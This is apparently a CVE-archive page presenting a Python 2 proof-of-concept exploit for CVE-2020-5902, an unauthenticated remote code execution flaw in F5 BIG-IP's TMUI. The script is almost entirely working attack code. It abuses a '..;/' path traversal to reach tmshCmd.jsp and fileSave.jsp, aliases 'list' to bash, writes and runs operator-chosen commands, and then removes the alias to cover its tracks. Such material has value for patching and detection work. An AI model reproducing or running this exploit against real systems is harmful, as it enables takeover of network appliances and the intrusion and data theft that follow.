4837 Total CVEs
26 Years
GitHub
Home / 2020 / CVE-2020-5902
README.md
Rendering markdown...
POC / CVE-2020-5902.py PY
⬇ Raw GitHub ✕ Close 
#coding:utf-8
import requests
import json
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import uuid
import sys

# tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
# fileSave.jsp?fileName=/tmp/cmd&content=id
# tmshCmd.jsp?command=list+/tmp/cmd
# tmshCmd.jsp?command=delete+cli+alias+private+list

banner = r'''
 _______  _______    ______  _________ _______   _________ _______    _______  _______  _______ 
(  ____ \(  ____ \  (  ___ \ \__   __/(  ____ \  \__   __/(  ____ )  (  ____ )(  ____ \(  ____ \
| (    \/| (    \/  | (   ) )   ) (   | (    \/     ) (   | (    )|  | (    )|| (    \/| (    \/
| (__    | (____    | (__/ /    | |   | |           | |   | (____)|  | (____)|| |      | (__    
|  __)   (_____ \   |  __ (     | |   | | ____      | |   |  _____)  |     __)| |      |  __)   
| (            ) )  | (  \ \    | |   | | \_  )     | |   | (        | (\ (   | |      | (      
| )      /\____) )  | )___) )___) (___| (___) |  ___) (___| )        | ) \ \__| (____/\| (____/\
|/       \______/   |/ \___/ \_______/(_______)  \_______/|/         |/   \__/(_______/(_______/
                                                                                                
                        CVE-2020-5902 UnAuth RCE Vuln
                            Python By Jas502n

From: https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
____________________________________________________________________________________________________________________________________________________
'''

def tmshCmd_exit(url,file,cmd):
    tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    r = requests.get(tmshCmd_url,verify=False,allow_redirects=False)
    # r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])
    # print type(response_str)
    # print response_str
    if r.status_code == 200 and 'tmui' in response_str:
        # print tmshCmd_url
        print "[+] tmshCmd.jsp Exit!"
        print "[+] create cli alias private list command bash \n"
        # cmd = 'whoami'
        upload_exit(url,file,cmd)


    else:
        print "[+] tmshCmd.jsp No Exit!\n"

def upload_exit(url,file,cmd):
    fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content="%file + cmd
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    r = requests.get(fileSave_url,verify=False,allow_redirects=False)
    # r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    if r.status_code == 200 and 'tmui' in response_str:
        # print fileSave_url
        print "[+] fileSave.jsp Exit!\n"
        list_command(url,file)
    else:
        print "[+] fileSave.jsp No Exit!\n"

def list_command(url,file):
    rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    r = requests.get(rce_url,verify=False,allow_redirects=False)
    # r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    # print len(r.content)
    if r.status_code == 200 and 'tmui' in response_str:
        if len(r.content) > 33:
            # print rce_url
            print "[+] Command Successfull !\n"
            command_result = json.loads(r.content)
            print "_"*90,'\n\n'
            print command_result['output']
            print "_"*90,"\n\n"
            delete_list(url)
    else:
        print "[+] Command Failed !\n"

def delete_list(url):
    delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    r = requests.get(delete_url,verify=False,allow_redirects=False)
    # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    if r.status_code == 200 and 'tmui' in response_str:
        # print delete_url
        print "[+] delete cli alias private list Successfull! \n"
    else:
        print "[+] delete cli alias private list Failed! \n"






if __name__ == '__main__':
    print banner
    while 1:
        url = "https://x.x.x.x/"
        # url = sys.argv[1]
        file = str(uuid.uuid1())
        print "/tmp/" + file,"\n"
        cmd = raw_input("[+]Set Cmd= ")
        print
        tmshCmd_exit(url,file,cmd)